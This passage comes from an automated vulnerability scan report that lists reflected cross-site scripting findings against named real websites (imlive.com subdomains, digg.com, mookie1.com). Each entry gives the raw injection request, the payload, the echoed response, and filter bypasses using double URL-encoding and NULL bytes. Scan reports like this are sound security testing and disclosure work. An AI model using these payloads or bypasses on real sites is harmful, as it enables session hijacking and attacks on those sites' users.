GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=ee4f7"><script>alert(1)</script>0f4356d3bc3&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: de.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RqcP8Em5lcLL9tsXaD3uSCr; spvdr=vd=6cc73906-033c-4d11-ab66-338112d0ebd8&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=wgmkqeerdlg5k445ra3fuif4;
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload db58b%2527onerror%253d%2527alert%25281%2529%252744c9eed88d was submitted in the gotopage parameter. This input was echoed as db58b'onerror='alert(1)'44c9eed88d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=db58b%2527onerror%253d%2527alert%25281%2529%252744c9eed88d HTTP/1.1 Host: de.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:08 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: ide=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDSSTRTBSD=CEBIMIMAOCCIFKMLDLMBDPAK; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:08 GMT Connection: close Content-Length: 8303 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8f5f"><script>alert(1)</script>74d0037b57 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583b8f5f"><script>alert(1)</script>74d0037b57&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: de.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RqcP8Em5lcLL9tsXaD3uSCr; spvdr=vd=6cc73906-033c-4d11-ab66-338112d0ebd8&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=wgmkqeerdlg5k445ra3fuif4;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0098146"><script>alert(1)</script>ae1b0ab27fe was submitted in the REST URL parameter 1. This input was echoed as 98146"><script>alert(1)</script>ae1b0ab27fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%0098146"><script>alert(1)</script>ae1b0ab27fe HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
4.283. http://dk.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dk.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31330"><script>alert(1)</script>1979371c19a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?31330"><script>alert(1)</script>1979371c19a=1 HTTP/1.1 Host: dk.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||31330"><script>alert(1)</script>1979371c19a~1');return false;"> ...[SNIP]...
4.284. http://dk.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dk.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 669d4'-alert(1)-'409ace51e58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?669d4'-alert(1)-'409ace51e58=1 HTTP/1.1 Host: dk.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39b96"><script>alert(1)</script>aa918e4b7e3 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=39b96"><script>alert(1)</script>aa918e4b7e3&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: dk.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=481b3f25-6cc2-41ad-b084-4179e10ea860&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=clna3wbxqiryybmrnfs1zj45; idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d099c"><script>alert(1)</script>1462ebc3ff2 was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=d099c"><script>alert(1)</script>1462ebc3ff2&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: dk.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=481b3f25-6cc2-41ad-b084-4179e10ea860&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=clna3wbxqiryybmrnfs1zj45; idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2babb%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527730ccb26132 was submitted in the gotopage parameter. This input was echoed as 2babb'style='x:expression(alert(1))'730ccb26132 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=2babb%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527730ccb26132 HTTP/1.1 Host: dk.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:16 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: idk=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDQQSTSCRD=JCBCPJMAPKIPKJHFCJIAJBAC; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:16 GMT Connection: close Content-Length: 8330 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c286"><script>alert(1)</script>f1e7aab618f was submitted in the promocode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA55834c286"><script>alert(1)</script>f1e7aab618f&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: dk.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=481b3f25-6cc2-41ad-b084-4179e10ea860&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=clna3wbxqiryybmrnfs1zj45; idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38595"><script>alert(1)</script>39a25e102d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:16 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0308"><script>alert(1)</script>e92931d1d13 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:22 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb2ff"><script>alert(1)</script>f34da647acb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:31 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 326 Content-Type: text/html
The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b0c1"-alert(1)-"9121c6f6f8b was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:12 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2483 Content-Type: text/html
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_3003b0c1"-alert(1)-"9121c6f6f8b";
4.293. http://dm.de.mookie1.com/2/B3DM/2010DM/11170717655@x23 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dm.de.mookie1.com
Path:
/2/B3DM/2010DM/11170717655@x23
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac99f"-alert(1)-"1eef0d2354a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:15 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2486 Content-Type: text/html
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_300&ac99f"-alert(1)-"1eef0d2354a=1";
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4aa20"><script>alert(1)</script>06e269b1e1b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:41 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4941c"><script>alert(1)</script>06ccdf3c634 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:47 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df8e4"><script>alert(1)</script>2ff75915346 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:14 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 325 Content-Type: text/html
The value of the USNetwork/ATTWL_11Q1_Cllctv_MobRON_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 291d7"-alert(1)-"efee496423e was submitted in the USNetwork/ATTWL_11Q1_Cllctv_MobRON_300 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:39 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2485 Content-Type: text/html
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/ATTWL_11Q1_Cllctv_MobRON_300291d7"-alert(1)-"efee496423e";
4.298. http://dm.de.mookie1.com/2/B3DM/2010DM/1120619784@x23 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dm.de.mookie1.com
Path:
/2/B3DM/2010DM/1120619784@x23
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6e8e"-alert(1)-"d03ef3df83b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:40 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2488 Content-Type: text/html
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/ATTWL_11Q1_Cllctv_MobRON_300&f6e8e"-alert(1)-"d03ef3df83b=1";
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27e8c"><script>alert(1)</script>e444b89420b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:49 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2645525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb7c0"><script>alert(1)</script>ffd68c8554e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:14 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65e59"><script>alert(1)</script>421d71bc1c5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:21 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 325 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/
The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2c42"-alert(1)-"8439d2acd81 was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:46 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2483 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_300c2c42"-alert(1)-"8439d2acd81";
4.303. http://dm.de.mookie1.com/2/B3DM/2010DM/11419206302@x23 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dm.de.mookie1.com
Path:
/2/B3DM/2010DM/11419206302@x23
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e9d3"-alert(1)-"c26e4d9cfe5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:48 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2486 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_300&5e9d3"-alert(1)-"c26e4d9cfe5=1";
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70ff5"><script>alert(1)</script>d6553860e48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:49 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94e82"><script>alert(1)</script>7a3c9d94146 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:55 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26307"><script>alert(1)</script>cf2e854f33a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:02:03 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 326 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660;path=/
The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e274"-alert(1)-"0556165f4c0 was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:27 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2483 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_3001e274"-alert(1)-"0556165f4c0";
4.308. http://dm.de.mookie1.com/2/B3DM/2010DM/11452529046@x23 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
